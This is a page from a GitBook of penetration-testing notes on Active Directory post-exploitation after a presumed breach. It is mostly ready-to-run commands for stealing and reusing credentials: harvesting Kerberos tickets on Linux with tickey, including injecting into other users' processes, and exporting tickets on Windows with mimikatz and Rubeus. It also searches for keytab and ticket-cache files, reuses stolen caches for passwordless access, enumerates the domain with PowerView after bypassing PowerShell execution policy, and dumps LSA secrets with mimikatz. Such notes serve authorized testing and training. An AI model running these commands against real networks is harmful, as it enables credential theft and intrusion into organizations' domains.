🤯
Hacker Mind
  • Penetration Testing Notes
    • 00 - Kali Linux Preparation
    • Page 1
    • Web Application (80/443)
      • XSS
      • LFI / Path Traversal
      • Wordpress
    • SMB (445)
    • LDAP
    • MSRPC (135)
    • MSSQL
    • Kerberos (88/tcp)
    • DNS (53)
    • IPv6
    • Import Nessus to Metasploit
  • STUCK? Look at this :D
  • Buffer Overflow
    • WinDbg
    • BoF Script Python
  • Active Directory Recon
    • Username Generation
    • PowerView
    • BloodHound
    • Flooding Attack
  • Payload
    • Sendemail
    • Phishing Payload
    • Bypass All The Things
      • AppLocker
      • MSBuild Shell
      • C# Runner
      • Payload Mod
      • Powershell
      • Bypass AV Linux
        • C Runner
  • Exploit
    • Brute Force
    • File Upload
    • Cracking
    • Shell & Stabilization
    • Database
    • MSSQL Injection
  • Tradecraft
    • Invoke-ReflectivePEInjection
  • Metasploit
    • Meterpreter Tricks
  • Privilege Escalation
    • Lateral Movement
    • Linux
    • Windows
  • Post Exploit
    • Active Directory
      • Kerberos
      • ACLs/ACEs
      • DCSync
      • Golden Ticket with krbtgt
      • LAPS
      • Page
      • Impersonate Token
    • Pivoting
      • Pivot in a Case
    • Transfer File
    • Exfiltration
    • Persistence
  • WiFi Pentesting
    • WPA-PSK
    • WPA-E (hostapd)
    • Attack WEP
    • Evil Twin - Wi-Fi
    • WPA3 Downgrade
  • Hardware Hacking
    • Information Gathering
  • Practice & Lab
Powered by GitBook
On this page
  • Enumerate Juicy Info
  • Harvest tickets from Linux
  • Harvest tickets from Windows
  • krb5.keytab
  • PowerView
  • Import module
  • The Domain Users
  • The Domain Groups
  • The Shared Folder
  • Net Computer
  • Mimikatz
  1. Post Exploit

Active Directory

This section mean you have an access to computer that connected to AD. This mean we assume breach on that computer.

PreviousPost ExploitNextKerberos

Last updated 7 months ago

Enumerate Juicy Info

Harvest tickets from Linux

Check type and location of tickets:

grep default_ccache_name /etc/krb5.conf

If none return, default is FILE:/tmp/krb5cc_%{uid}.

In case of file tickets, you can copy-paste (if you have permissions) for use them.

In case of being KEYRING tickets, you can use to get them:

# To dump current user tickets, if root, try to dump them all by injecting in other user processes
# to inject, copy tickey in a reachable folder by all users
cp tickey /tmp/tickey
/tmp/tickey -i

Harvest tickets from Windows

With :

mimikatz # sekurlsa::tickets /export

With in Powershell:

.\Rubeus dump

# After dump with Rubeus tickets in base64, to write the in a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))

reference:

krb5.keytab

# Linux cache kerberost ticket

find / -type f -iname "krb5.keytab" 2>/dev/null
find / -type f -iname "krb5cc_*" 2>/dev/null



# Windows cache kerberost ticket

dir "\krb5*.keytab" /s
dir "\krb5cc_*" /s

if you found the krb5cc_* file, just export it to env variable KRB5CCNAME then check with klist

export KRB5CCNAME=/tmp/krb5cc*
klist

# if imported it mean you able to auto logon without password

python3 GetADUsers.py -all -k -no-pass -dc-ip 172.16.x.y <domain>/<username>

PowerView

Import module

powershell -ep bypass
[PS] . .\PowerView.ps1

The Domain Users

Get-NetUser | select cn

# dump the interesting info
Get-NetUser | select cn,lastlogon,logoncount,memberof

The Domain Groups

Get-NetGroup -GroupName *admin*

The Shared Folder

Invoke-SharedFinder

Note: Default shared folder:

ADMIN$
C$
IPC$
NETLOGON
SYSVOL

Net Computer

Get-NetComputer -FullData
Get-NetComputer -FullData |select operatingsystem

Mimikatz

note: must run as administrator

mimikats.exe

privilege::debug
lsadump::lsa /patch

extract with this ->

tickey
Mimikatz
Rubeus
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
https://github.com/sosdave/KeyTabExtract/blob/master/keytabextract.py